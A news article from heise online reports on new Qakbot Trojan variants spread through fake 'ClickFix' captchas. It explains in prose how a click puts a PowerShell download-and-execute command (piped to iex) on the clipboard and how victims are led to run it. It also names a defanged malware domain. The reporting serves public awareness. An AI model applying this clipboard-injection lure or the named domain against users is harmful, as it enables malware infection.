Malware: Qakbot distributed with false captchas
The Qakbot Trojans have been quiet for some time. Now criminals are distributing new variants with fake captchas.
(Image: Erstellt mit KI in Bing Creator von heise online / dmk)
The malware Qakbot flew under the radar for a long time – now IT researchers have detected new variants of the Trojan. They are currently finding victims via fake "Clickfix Captchas". The German Federal Office for Information Security also recently issued a warning about these.
A phishing campaign in which Qakbot malware was distributed in an attempt to rebuild the botnet was last reported at the end of 2023. IT security researchers from Darkatlas have now come across the malware again. It is now being distributed using so-called fake captchas.
Fake captchas with user interaction
In the fake captcha scam, criminals take advantage of the fact that internet users are asked to solve so-called captchas everywhere. This is to prove that they are human and not malicious scripts ("I am not a robot").
(Image:Â heise online / dmk)
The click does two things: Firstly, a malicious command is added to the clipboard. This calls up Windows Powershell and instructs the powerful command line interpreter to download a script from a website and execute it. On the other hand, the click advances a graphic.
(Image:Â heise online / dmk)
This contains instructions on how to call up the command execution from Windows and paste the command from the clipboard. As a distraction, the criminals call the window that pops up a "verification window". And at the end, the victims have to press the Enter key – but then it's "game over" and the malware is installed and activated.
Videos by heise
Darkatlas explains the infection process in more detail. The command that is copied to the clipboard ends with a pipe to "iex", which causes Powershell to interpret the received string as a command (iex=Invoke Expression). Most of the malware script is encoded, but a few plain text commands open a window titled "Information" and displaying "Verification complete!" to appear authentic.
The script downloads a ZIP file, saves it, extracts it and finally executes its contents. No matter what the file name is in the URL in the download script, the server will deliver a malware ZIP file. The use of arbitrary URLs also makes detection and blocking more difficult here. Darkatlas has tested a sample with Virustotal and the detection rate is close to zero. However, Darkatlas does not provide any indications of infections (Indicators of Compromise, IOCs). However, the actual malware domain is duolingos[.]com.
The BSI warned against such fake captchas on the Mastodon social network at the beginning of the month. In an interview with heise online, the co-founder of "Friendly Captcha" also discussed the scam.
(dmk)
